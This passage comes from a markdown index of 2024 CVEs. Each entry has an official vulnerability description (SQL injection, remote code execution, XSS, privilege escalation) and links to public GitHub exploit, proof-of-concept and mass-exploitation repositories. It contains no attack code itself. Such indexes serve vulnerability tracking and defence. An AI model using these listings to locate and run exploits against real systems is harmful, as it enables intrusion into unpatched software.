[J4F9S5D2Q7/CVE-2024-24919-CHECKPOINT](https://github.com/J4F9S5D2Q7/CVE-2024-24919-CHECKPOINT) +- [mr-kasim-mehar/CVE-2024-24919-Exploit](https://github.com/mr-kasim-mehar/CVE-2024-24919-Exploit) +- [B1naryo/CVE-2024-24919-POC](https://github.com/B1naryo/CVE-2024-24919-POC) +- [Expl0itD0g/CVE-2024-24919---Poc](https://github.com/Expl0itD0g/CVE-2024-24919---Poc) +- [bigb0x/CVE-2024-24919-Sniper](https://github.com/bigb0x/CVE-2024-24919-Sniper) +- [birdlex/cve-2024-24919-checker](https://github.com/birdlex/cve-2024-24919-checker) +- [Rug4lo/CVE-2024-24919-Exploit](https://github.com/Rug4lo/CVE-2024-24919-Exploit) +- [0nin0hanz0/CVE-2024-24919-PoC](https://github.com/0nin0hanz0/CVE-2024-24919-PoC) +- [GuayoyoCyber/CVE-2024-24919](https://github.com/GuayoyoCyber/CVE-2024-24919) +- [0xans/CVE-2024-24919](https://github.com/0xans/CVE-2024-24919) +- [Tim-Hoekstra/CVE-2024-24919](https://github.com/Tim-Hoekstra/CVE-2024-24919) +- [starlox0/CVE-2024-24919-POC](https://github.com/starlox0/CVE-2024-24919-POC) +- [nullcult/CVE-2024-24919-Exploit](https://github.com/nullcult/CVE-2024-24919-Exploit) +- [satchhacker/cve-2024-24919](https://github.com/satchhacker/cve-2024-24919) +- [verylazytech/CVE-2024-24919](https://github.com/verylazytech/CVE-2024-24919) +- [protonnegativo/CVE-2024-24919](https://github.com/protonnegativo/CVE-2024-24919) +- [SalehLardhi/CVE-2024-24919](https://github.com/SalehLardhi/CVE-2024-24919) +- [ShadowByte1/CVE-2024-24919](https://github.com/ShadowByte1/CVE-2024-24919) +- [H3KEY/CVE-2024-24919](https://github.com/H3KEY/CVE-2024-24919) +- [Jutrm/cve-2024-24919](https://github.com/Jutrm/cve-2024-24919) +- [LuisMateo1/Arbitrary-File-Read-CVE-2024-24919](https://github.com/LuisMateo1/Arbitrary-File-Read-CVE-2024-24919) +- [AhmedMansour93/Event-ID-263-Rule-Name-SOC287---Arbitrary-File-Read-on-Checkpoint-Security-Gateway-CVE-2024-24919-](https://github.com/AhmedMansour93/Event-ID-263-Rule-Name-SOC287---Arbitrary-File-Read-on-Checkpoint-Security-Gateway-CVE-2024-24919-) +- [geniuszlyy/CVE-2024-24919](https://github.com/geniuszlyy/CVE-2024-24919) +- [skyrowalker/CVE-2024-24919](https://github.com/skyrowalker/CVE-2024-24919) +- [sar-3mar/CVE-2024-24919_POC](https://github.com/sar-3mar/CVE-2024-24919_POC) + +### CVE-2024-25092 (2024-06-09) + +Missing Authorization vulnerability in XLPlugins NextMove Lite.This issue affects NextMove Lite: from n/a through 2.17.0. + + +- [RandomRobbieBF/CVE-2024-25092](https://github.com/RandomRobbieBF/CVE-2024-25092) + +### CVE-2024-25153 (2024-03-13) + +A directory traversal within the ‘ftpservlet’ of the FileCatalyst Workflow Web Portal allows files to be uploaded outside of the intended ‘uploadtemp’ directory with a specially crafted POST request. In situations where a file is successfully uploaded to web portal’s DocumentRoot, specially crafted JSP files could be used to execute code, including web shells. + + +- [nettitude/CVE-2024-25153](https://github.com/nettitude/CVE-2024-25153) +- [rainbowhatrkn/CVE-2024-25153](https://github.com/rainbowhatrkn/CVE-2024-25153) + +### CVE-2024-25169 (2024-02-28) + +An issue in Mezzanine v6.0.0 allows attackers to bypass access control mechanisms in the admin panel via a crafted request. + + +- [shenhav12/CVE-2024-25169-Mezzanine-v6.0.0](https://github.com/shenhav12/CVE-2024-25169-Mezzanine-v6.0.0) + +### CVE-2024-25170 (2024-02-28) + +An issue in Mezzanine v6.0.0 allows attackers to bypass access controls via manipulating the Host header. + + +- [shenhav12/CVE-2024-25170-Mezzanine-v6.0.0](https://github.com/shenhav12/CVE-2024-25170-Mezzanine-v6.0.0) + +### CVE-2024-25175 (2024-03-25) + +An issue in Kickdler before v1.107.0 allows attackers to provide an XSS payload via a HTTP response splitting attack. + + +- [jet-pentest/CVE-2024-25175](https://github.com/jet-pentest/CVE-2024-25175) + +### CVE-2024-25202 (2024-02-28) + +Cross Site Scripting vulnerability in Phpgurukul User Registration & Login and User Management System 1.0 allows attackers to run arbitrary code via the search bar. + + +- [Agampreet-Singh/CVE-2024-25202](https://github.com/Agampreet-Singh/CVE-2024-25202) + +### CVE-2024-25227 (2024-03-15) + +SQL Injection vulnerability in ABO.CMS version 5.8, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via the tb_login parameter in admin login page. + + +- [thetrueartist/ABO.CMS-Login-SQLi-CVE-2024-25227](https://github.com/thetrueartist/ABO.CMS-Login-SQLi-CVE-2024-25227) +- [thetrueartist/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227](https://github.com/thetrueartist/ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227) + +### CVE-2024-25270 (2024-09-12) + +An issue in Mirapolis LMS 4.6.XX allows authenticated users to exploit an Insecure Direct Object Reference (IDOR) vulnerability by manipulating the ID parameter and increment STEP parameter, leading to the exposure of sensitive user data. + + +- [fbkcs/CVE-2024-25270](https://github.com/fbkcs/CVE-2024-25270) + +### CVE-2024-25277 +- [maen08/CVE-2024-25277](https://github.com/maen08/CVE-2024-25277) + +### CVE-2024-25278 +- [sajaljat/CVE-2024-25278](https://github.com/sajaljat/CVE-2024-25278) + +### CVE-2024-25279 +- [sajaljat/CVE-2024-25279](https://github.com/sajaljat/CVE-2024-25279) + +### CVE-2024-25280 +- [sajaljat/CVE-2024-25280](https://github.com/sajaljat/CVE-2024-25280) + +### CVE-2024-25281 +- [sajaljat/CVE-2024-25281](https://github.com/sajaljat/CVE-2024-25281) + +### CVE-2024-25291 (2024-02-29) + +Deskfiler v1.2.3 allows attackers to execute arbitrary code via uploading a crafted plugin. + + +- [EQSTLab/CVE-2024-25291](https://github.com/EQSTLab/CVE-2024-25291) + +### CVE-2024-25292 (2024-02-29) + +Cross-site scripting (XSS) vulnerability in RenderTune v1.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Upload Title parameter. + + +- [EQSTLab/CVE-2024-25292](https://github.com/EQSTLab/CVE-2024-25292) + +### CVE-2024-25293 (2024-03-01) + +mjml-app versions 3.0.4 and 3.1.0-beta were discovered to contain a remote code execution (RCE) via the href attribute. + + +- [EQSTLab/CVE-2024-25293](https://github.com/EQSTLab/CVE-2024-25293) + +### CVE-2024-25376 (2024-04-11) + +An issue discovered in Thesycon Software Solutions Gmbh & Co. KG TUSBAudio MSI-based installers before 5.68.0 allows a local attacker to execute arbitrary code via the msiexec.exe repair mode. + + +- [ewilded/CVE-2024-25376-POC](https://github.com/ewilded/CVE-2024-25376-POC) + +### CVE-2024-25381 (2024-02-21) + +There is a Stored XSS Vulnerability in Emlog Pro 2.2.8 Article Publishing, due to non-filtering of quoted content. + + +- [Ox130e07d/CVE-2024-25381](https://github.com/Ox130e07d/CVE-2024-25381) + +### CVE-2024-25411 (2024-09-27) + +A cross-site scripting (XSS) vulnerability in Flatpress v1.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the username parameter in setup.php. + + +- [paragbagul111/CVE-2024-25411](https://github.com/paragbagul111/CVE-2024-25411) + +### CVE-2024-25412 (2024-09-27) + +A cross-site scripting (XSS) vulnerability in Flatpress v1.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the email field. + + +- [paragbagul111/CVE-2024-25412](https://github.com/paragbagul111/CVE-2024-25412) + +### CVE-2024-25423 (2024-02-22) + +An issue in MAXON CINEMA 4D R2024.2.0 allows a local attacker to execute arbitrary code via a crafted c4d_base.xdl64 file. + + +- [DriverUnload/cve-2024-25423](https://github.com/DriverUnload/cve-2024-25423) + +### CVE-2024-25466 (2024-02-16) + +Directory Traversal vulnerability in React Native Document Picker before v.9.1.1 and fixed in v.9.1.1 allows a local attacker to execute arbitrary code via a crafted script to the Android library component. + + +- [FixedOctocat/CVE-2024-25466](https://github.com/FixedOctocat/CVE-2024-25466) + +### CVE-2024-25503 (2024-04-04) + +Cross Site Scripting (XSS) vulnerability in Advanced REST Client v.17.0.9 allows a remote attacker to execute arbitrary code and obtain sensitive information via a crafted script to the edit details parameter of the New Project function. + + +- [EQSTLab/CVE-2024-25503](https://github.com/EQSTLab/CVE-2024-25503) + +### CVE-2024-25600 (2024-06-04) + +Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection.This issue affects Bricks Builder: from n/a through 1.9.6. + + +- [Chocapikk/CVE-2024-25600](https://github.com/Chocapikk/CVE-2024-25600) +- [Christbowel/CVE-2024-25600_Nuclei-Template](https://github.com/Christbowel/CVE-2024-25600_Nuclei-Template) +- [Tornad0007/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress](https://github.com/Tornad0007/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress) +- [hy011121/CVE-2024-25600-wordpress-Exploit-RCE](https://github.com/hy011121/CVE-2024-25600-wordpress-Exploit-RCE) +- [K3ysTr0K3R/CVE-2024-25600-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT) +- [X-Projetion/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE](https://github.com/X-Projetion/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE) +- [svchostmm/CVE-2024-25600-mass](https://github.com/svchostmm/CVE-2024-25600-mass) +- [ivanbg2004/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress](https://github.com/ivanbg2004/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress) +- [k3lpi3b4nsh33/CVE-2024-25600](https://github.com/k3lpi3b4nsh33/CVE-2024-25600) +- [WanLiChangChengWanLiChang/CVE-2024-25600](https://github.com/WanLiChangChengWanLiChang/CVE-2024-25600) +- [KaSooMi0228/CVE-2024-25600-Bricks-Builder-WordPress](https://github.com/KaSooMi0228/CVE-2024-25600-Bricks-Builder-WordPress) +- [wh6amiGit/CVE-2024-25600](https://github.com/wh6amiGit/CVE-2024-25600) + +### CVE-2024-25641 (2024-05-13) + +Cacti provides an operational monitoring and fault management framework. Prior to version 1.2.27, an arbitrary file write vulnerability, exploitable through the "Package Import" feature, allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server. The vulnerability is located within the `import_package()` function defined into the `/lib/import.php` script. The function blindly trusts the filename and file content provided within the XML data, and writes such files into the Cacti base path (or even outside, since path traversal sequences are not filtered). This can be exploited to write or overwrite arbitrary files on the web server, leading to execution of arbitrary PHP code or other security impacts. Version 1.2.27 contains a patch for this issue. + + +- [5ma1l/CVE-2024-25641](https://github.com/5ma1l/CVE-2024-25641) +- [thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26](https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26) +- [Safarchand/CVE-2024-25641](https://github.com/Safarchand/CVE-2024-25641) +- [StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26](https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26) +- [XiaomingX/cve-2024-25641-poc](https://github.com/XiaomingX/cve-2024-25641-poc) + +### CVE-2024-25723 (2024-02-27) + +ZenML Server in the ZenML machine learning package before 0.46.7 for Python allows remote privilege escalation because the /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on the basis of a valid username along with a new password in the request body. These are also patched versions: 0.44.4, 0.43.1, and 0.42.2. + + +- [david-botelho-mariano/exploit-CVE-2024-25723](https://github.com/david-botelho-mariano/exploit-CVE-2024-25723) + +### CVE-2024-25731 (2024-03-04) + +The Elink Smart eSmartCam (com.cn.dq.ipc) application 2.1.5 for Android contains hardcoded AES encryption keys that can be extracted from a binary file. Thus, encryption can be defeated by an attacker who can observe packet data (e.g., over Wi-Fi). + + +- [actuator/com.cn.dq.ipc](https://github.com/actuator/com.cn.dq.ipc) + +### CVE-2024-25733 +- [hackintoanetwork/ARC-Browser-Address-Bar-Spoofing-PoC](https://github.com/hackintoanetwork/ARC-Browser-Address-Bar-Spoofing-PoC) + +### CVE-2024-25809 +- [sajaljat/CVE-2024-25809](https://github.com/sajaljat/CVE-2024-25809) + +### CVE-2024-25832 (2024-02-28) + +F-logic DataCube3 v1.0 is vulnerable to unrestricted file upload, which could allow an authenticated malicious actor to upload a file of dangerous type by manipulating the filename extension. + + +- [0xNslabs/CVE-2024-25832-PoC](https://github.com/0xNslabs/CVE-2024-25832-PoC) + +### CVE-2024-25897 (2024-02-21) + +ChurchCRM 5.5.0 FRCatalog.php is vulnerable to Blind SQL Injection (Time-based) via the CurrentFundraiser GET parameter. + + +- [i-100-user/CVE-2024-25897](https://github.com/i-100-user/CVE-2024-25897) + +### CVE-2024-26026 (2024-05-08) + +\n\n\nAn SQL injection vulnerability exists in the BIG-IP Next Central Manager API (URI).  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated\n\n + + +- [passwa11/CVE-2024-26026](https://github.com/passwa11/CVE-2024-26026) +- [GRTMALDET/Big-IP-Next-CVE-2024-26026](https://github.com/GRTMALDET/Big-IP-Next-CVE-2024-26026) + +### CVE-2024-26144 (2024-02-27) + +Rails is a web-application framework. Starting with version 5.2.0, there is a possible sensitive session information leak in Active Storage. By default, Active Storage sends a Set-Cookie header along with the user's session cookie when serving blobs. It also sets Cache-Control to public. Certain proxies may cache the Set-Cookie, leading to an information leak. The vulnerability is fixed in 7.0.8.1 and 6.1.7.7. + + +- [gmo-ierae/CVE-2024-26144-test](https://github.com/gmo-ierae/CVE-2024-26144-test) + +### CVE-2024-26160 (2024-03-12) + +Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability + + +- [xsh3llsh0ck/CVE-2024-26160](https://github.com/xsh3llsh0ck/CVE-2024-26160) + +### CVE-2024-26218 (2024-04-09) + +Windows Kernel Elevation of Privilege Vulnerability + + +- [exploits-forsale/CVE-2024-26218](https://github.com/exploits-forsale/CVE-2024-26218) + +### CVE-2024-26229 (2024-04-09) + +Windows CSC Service Elevation of Privilege Vulnerability + + +- [varwara/CVE-2024-26229](https://github.com/varwara/CVE-2024-26229) +- [RalfHacker/CVE-2024-26229-exploit](https://github.com/RalfHacker/CVE-2024-26229-exploit) +- [apkc/CVE-2024-26229-BOF](https://github.com/apkc/CVE-2024-26229-BOF) +- [team-MineDEV/CVE-2024-26229](https://github.com/team-MineDEV/CVE-2024-26229) +- [Cracked5pider/eop24-26229](https://github.com/Cracked5pider/eop24-26229) +- [mqxmm/CVE-2024-26229](https://github.com/mqxmm/CVE-2024-26229) + +### CVE-2024-26230 (2024-04-09) + +Windows Telephony Server Elevation of Privilege Vulnerability + + +- [kiwids0220/CVE-2024-26230](https://github.com/kiwids0220/CVE-2024-26230) +- [Wa1nut4/CVE-2024-26230](https://github.com/Wa1nut4/CVE-2024-26230) + +### CVE-2024-26304 (2024-05-01) + +There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system. \n\n + + +- [X-Projetion/CVE-2024-26304-RCE-exploit](https://github.com/X-Projetion/CVE-2024-26304-RCE-exploit) + +### CVE-2024-26308 (2024-02-19) + +Allocation of Resources Without Limits or Throttling vulnerability in Apache Commons Compress.This issue affects Apache Commons Compress: from 1.21 before 1.26.\n\nUsers are recommended to upgrade to version 1.26, which fixes the issue.\n\n + + +- [crazycatMyopic/cve](https://github.com/crazycatMyopic/cve) + +### CVE-2024-26475 (2024-03-14) + +An issue in radareorg radare2 v.0.9.7 through v.5.8.6 and fixed in v.5.8.8 allows a local attacker to cause a denial of service via the grub_sfs_read_extent function. + + +- [TronciuVlad/CVE-2024-26475](https://github.com/TronciuVlad/CVE-2024-26475) + +### CVE-2024-26503 (2024-03-14) + +Unrestricted File Upload vulnerability in Greek Universities Network Open eClass v.3.15 and earlier allows attackers to run arbitrary code via upload of crafted file to certbadge.php endpoint. + + +- [RoboGR00t/Exploit-CVE-2024-26503](https://github.com/RoboGR00t/Exploit-CVE-2024-26503) + +### CVE-2024-26521 (2024-03-12) + +HTML Injection vulnerability in CE Phoenix v1.0.8.20 and before allows a remote attacker to execute arbitrary code, escalate privileges, and obtain sensitive information via a crafted payload to the english.php component. + + +- [hackervegas001/CVE-2024-26521](https://github.com/hackervegas001/CVE-2024-26521) + +### CVE-2024-26534 +- [sajaljat/CVE-2024-26534](https://github.com/sajaljat/CVE-2024-26534) + +### CVE-2024-26535 +- [sajaljat/CVE-2024-26535](https://github.com/sajaljat/CVE-2024-26535) + +### CVE-2024-26560 +- [sajaljat/CVE-2024-26560](https://github.com/sajaljat/CVE-2024-26560) + +### CVE-2024-26574 (2024-04-08) + +Insecure Permissions vulnerability in Wondershare Filmora v.13.0.51 allows a local attacker to execute arbitrary code via a crafted script to the WSNativePushService.exe + + +- [Alaatk/CVE-2024-26574](https://github.com/Alaatk/CVE-2024-26574) + +### CVE-2024-26581 (2024-02-20) + +In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_rbtree: skip end interval element from gc\n\nrbtree lazy gc on insert might collect an end interval element that has\nbeen just added in this transactions, skip end interval elements that\nare not yet active. + + +- [madfxr/CVE-2024-26581-Checker](https://github.com/madfxr/CVE-2024-26581-Checker) +- [laoqin1234/Linux-Root-CVE-2024-26581-PoC](https://github.com/laoqin1234/Linux-Root-CVE-2024-26581-PoC) + +### CVE-2024-26817 (2024-04-13) + +In the Linux kernel, the following vulnerability has been resolved:\n\namdkfd: use calloc instead of kzalloc to avoid integer overflow\n\nThis uses calloc instead of doing the multiplication which might\noverflow. + + +- [MaherAzzouzi/CVE-2024-26817-amdkfd](https://github.com/MaherAzzouzi/CVE-2024-26817-amdkfd) + +### CVE-2024-27088 (2024-02-26) + +es5-ext contains ECMAScript 5 extensions. Passing functions with very long names or complex default argument names into `function#copy` or `function#toStringTokens` may cause the script to stall. The vulnerability is patched in v0.10.63. + + +- [200101WhoAmI/CVE-2024-27088](https://github.com/200101WhoAmI/CVE-2024-27088) + +### CVE-2024-27130 (2024-05-21) + +A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute code via a network.\n\nWe have already fixed the vulnerability in the following version:\nQTS 5.1.7.2770 build 20240520 and later\nQuTS hero h5.1.7.2770 build 20240520 and later + + +- [watchtowrlabs/CVE-2024-27130](https://github.com/watchtowrlabs/CVE-2024-27130) +- [d0rb/CVE-2024-27130](https://github.com/d0rb/CVE-2024-27130) +- [XiaomingX/cve-2024-27130-poc](https://github.com/XiaomingX/cve-2024-27130-poc) + +### CVE-2024-27173 (2024-06-14) + +Remote Command program allows an attacker to get Remote Code Execution by overwriting existing Python files containing executable code. This vulnerability can be executed in combination with other vulnerabilities and difficult to execute alone. So, the CVSS score for this vulnerability alone is lower than the score listed in the "Base Score" of this vulnerability. For detail on related other vulnerabilities, please ask to the below contact point.\n https://www.toshibatec.com/contacts/products/ \nAs for the affected products/models/versions, see the reference URL. + + +- [Ieakd/0day-POC-for-CVE-2024-27173](https://github.com/Ieakd/0day-POC-for-CVE-2024-27173) + +### CVE-2024-27198 (2024-03-04) + +In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible + + +- [Chocapikk/CVE-2024-27198](https://github.com/Chocapikk/CVE-2024-27198) +- [yoryio/CVE-2024-27198](https://github.com/yoryio/CVE-2024-27198) +- [W01fh4cker/CVE-2024-27198-RCE](https://github.com/W01fh4cker/CVE-2024-27198-RCE) +- [rampantspark/CVE-2024-27198](https://github.com/rampantspark/CVE-2024-27198) +- [passwa11/CVE-2024-27198-RCE](https://github.com/passwa11/CVE-2024-27198-RCE) +- [CharonDefalt/CVE-2024-27198-RCE](https://github.com/CharonDefalt/CVE-2024-27198-RCE) +- [K3ysTr0K3R/CVE-2024-27198-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-27198-EXPLOIT) +- [Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-](https://github.com/Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-) +- [Stuub/RCity-CVE-2024-27198](https://github.com/Stuub/RCity-CVE-2024-27198) +- [HPT-Intern-Task-Submission/CVE-2024-27198](https://github.com/HPT-Intern-Task-Submission/CVE-2024-27198) +- [jrbH4CK/CVE-2024-27198](https://github.com/jrbH4CK/CVE-2024-27198) +- [geniuszlyy/CVE-2024-27198](https://github.com/geniuszlyy/CVE-2024-27198) +- [Cythonic1/CVE-2024-27198_POC](https://github.com/Cythonic1/CVE-2024-27198_POC) + +### CVE-2024-27292 (2024-02-29) + +Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch. + + +- [th3gokul/CVE-2024-27292](https://github.com/th3gokul/CVE-2024-27292) + +### CVE-2024-27316 (2024-04-04) + +HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion. + + +- [lockness-Ko/CVE-2024-27316](https://github.com/lockness-Ko/CVE-2024-27316) +- [aeyesec/CVE-2024-27316_poc](https://github.com/aeyesec/CVE-2024-27316_poc) + +### CVE-2024-27348 (2024-04-22) + +RCE-Remote Command Execution vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 in Java8 & Java11\n\nUsers are recommended to upgrade to version 1.3.0 with Java11 & enable the Auth system, which fixes the issue.\n\n + + +- [Zeyad-Azima/CVE-2024-27348](https://github.com/Zeyad-Azima/CVE-2024-27348) +- [kljunowsky/CVE-2024-27348](https://github.com/kljunowsky/CVE-2024-27348) +- [jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE](https://github.com/jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE) + +### CVE-2024-27460 (2024-05-10) + +A privilege escalation exists in the updater for Plantronics Hub 3.25.1 and below. + + +- [xct/CVE-2024-27460](https://github.com/xct/CVE-2024-27460) +- [Alaatk/CVE-2024-27460](https://github.com/Alaatk/CVE-2024-27460) +- [10cks/CVE-2024-27460-installer](https://github.com/10cks/CVE-2024-27460-installer) + +### CVE-2024-27462 +- [Alaatk/CVE-2024-27462](https://github.com/Alaatk/CVE-2024-27462) + +### CVE-2024-27474 (2024-04-10) + +Leantime 3.0.6 is vulnerable to Cross Site Request Forgery (CSRF). This vulnerability allows malicious actors to perform unauthorized actions on behalf of authenticated users, specifically administrators. + + +- [dead1nfluence/Leantime-POC](https://github.com/dead1nfluence/Leantime-POC) + +### CVE-2024-27518 (2024-04-29) + +An issue in SUPERAntiSyware Professional X 10.0.1262 and 10.0.1264 allows unprivileged attackers to escalate privileges via a restore of a crafted DLL file into the C:\Program Files\SUPERAntiSpyware folder. + + +- [secunnix/CVE-2024-27518](https://github.com/secunnix/CVE-2024-27518) + +### CVE-2024-27564 (2024-03-05) + +A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter. + + +- [MuhammadWaseem29/SSRF-Exploit-CVE-2024-27564](https://github.com/MuhammadWaseem29/SSRF-Exploit-CVE-2024-27564) +- [Quantum-Hacker/CVE-2024-27564](https://github.com/Quantum-Hacker/CVE-2024-27564) + +### CVE-2024-27619 (2024-03-29) + +Dlink Dir-3040us A1 1.20b03a hotfix is vulnerable to Buffer Overflow. Any user having read/write access to ftp server can write directly to ram causing buffer overflow if file or files uploaded are greater than available ram. Ftp server allows change of directory to root which is one level up than root of usb flash directory. During upload ram is getting filled and causing system resource exhaustion (no free memory) which causes system to crash and reboot. + + +- [ioprojecton/dir-3040_dos](https://github.com/ioprojecton/dir-3040_dos) + +### CVE-2024-27630 (2024-04-08) + +Insecure Direct Object Reference (IDOR) in GNU Savane v.3.12 and before allows a remote attacker to delete arbitrary files via crafted input to the trackers_data_delete_file function. + + +- [ally-petitt/CVE-2024-27630](https://github.com/ally-petitt/CVE-2024-27630) + +### CVE-2024-27631 (2024-04-08) + +Cross Site Request Forgery vulnerability in GNU Savane v.3.12 and before allows a remote attacker to escalate privileges via siteadmin/usergroup.php + + +- [ally-petitt/CVE-2024-27631](https://github.com/ally-petitt/CVE-2024-27631) + +### CVE-2024-27632 (2024-04-08) + +An issue in GNU Savane v.3.12 and before allows a remote attacker to escalate privileges via the form_id in the form_header() function. + + +- [ally-petitt/CVE-2024-27632](https://github.com/ally-petitt/CVE-2024-27632) + +### CVE-2024-27665 (2024-04-09) + +Unifiedtransform v2.X is vulnerable to Stored Cross-Site Scripting (XSS) via file upload feature in Syllabus module. + + +- [Thirukrishnan/CVE-2024-27665](https://github.com/Thirukrishnan/CVE-2024-27665) + +### CVE-2024-27673 +- [Alaatk/CVE-2024-27673](https://github.com/Alaatk/CVE-2024-27673) + +### CVE-2024-27674 (2024-04-03) + +Macro Expert through 4.9.4 allows BUILTIN\Users:(OI)(CI)(M) access to the "%PROGRAMFILES(X86)%\GrassSoft\Macro Expert" folder and thus an unprivileged user can escalate to SYSTEM by replacing the MacroService.exe binary. + + +- [Alaatk/CVE-2024-27674](https://github.com/Alaatk/CVE-2024-27674) + +### CVE-2024-27697 +- [SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697](https://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697) + +### CVE-2024-27766 (2024-10-17) + +An issue in MariaDB v.11.1 allows a remote attacker to execute arbitrary code via the lib_mysqludf_sys.so function. NOTE: this is disputed by the MariaDB Foundation because no privilege boundary is crossed. + + +- [Ant1sec-ops/CVE-2024-27766](https://github.com/Ant1sec-ops/CVE-2024-27766) + +### CVE-2024-27804 (2024-05-13) + +The issue was addressed with improved memory handling. This issue is fixed in iOS 17.5 and iPadOS 17.5, tvOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges. + + +- [R00tkitSMM/CVE-2024-27804](https://github.com/R00tkitSMM/CVE-2024-27804) + +### CVE-2024-27815 (2024-06-10) + +An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges. + + +- [jprx/CVE-2024-27815](https://github.com/jprx/CVE-2024-27815) + +### CVE-2024-27821 (2024-05-13) + +A path handling issue was addressed with improved validation. This issue is fixed in iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. A shortcut may output sensitive user data without consent. + + +- [0xilis/CVE-2024-27821](https://github.com/0xilis/CVE-2024-27821) + +### CVE-2024-27914 (2024-03-18) + +GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An unauthenticated user can provide a malicious link to a GLPI administrator in order to exploit a reflected XSS vulnerability. The XSS will only trigger if the administrator navigates through the debug bar. This issue has been patched in version 10.0.13.\n + + +- [shellkraft/CVE-2024-27914](https://github.com/shellkraft/CVE-2024-27914) + +### CVE-2024-27954 (2024-05-17) + +Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in WP Automatic Automatic allows Path Traversal, Server Side Request Forgery.This issue affects Automatic: from n/a through 3.92.0. + + +- [gh-ost00/CVE-2024-27954](https://github.com/gh-ost00/CVE-2024-27954) +- [Quantum-Hacker/CVE-2024-27954](https://github.com/Quantum-Hacker/CVE-2024-27954) + +### CVE-2024-27956 (2024-03-21) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection.This issue affects Automatic: from n/a through 3.92.0.\n\n + + +- [truonghuuphuc/CVE-2024-27956](https://github.com/truonghuuphuc/CVE-2024-27956) +- [diego-tella/CVE-2024-27956-RCE](https://github.com/diego-tella/CVE-2024-27956-RCE) +- [X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN](https://github.com/X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN) +- [FoxyProxys/CVE-2024-27956](https://github.com/FoxyProxys/CVE-2024-27956) +- [k3ppf0r/CVE-2024-27956](https://github.com/k3ppf0r/CVE-2024-27956) +- [AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956](https://github.com/AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956) +- [W3BW/CVE-2024-27956-RCE-File-Package](https://github.com/W3BW/CVE-2024-27956-RCE-File-Package) +- [Cappricio-Securities/CVE-2024-27956](https://github.com/Cappricio-Securities/CVE-2024-27956) +- [itzheartzz/MASS-CVE-2024-27956](https://github.com/itzheartzz/MASS-CVE-2024-27956) +- [TadashiJei/Valve-Press-CVE-2024-27956-RCE](https://github.com/TadashiJei/Valve-Press-CVE-2024-27956-RCE) +- [cve-2024/CVE-2024-27956-RCE](https://github.com/cve-2024/CVE-2024-27956-RCE) +- [ThatNotEasy/CVE-2024-27956](https://github.com/ThatNotEasy/CVE-2024-27956) +- [CERTologists/EXPLOITING-CVE-2024-27956](https://github.com/CERTologists/EXPLOITING-CVE-2024-27956) + +### CVE-2024-27971 (2024-05-17) + +Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Premmerce Premmerce Permalink Manager for WooCommerce allows PHP Local File Inclusion.This issue affects Premmerce Permalink Manager for WooCommerce: from n/a through 2.3.10. + + +- 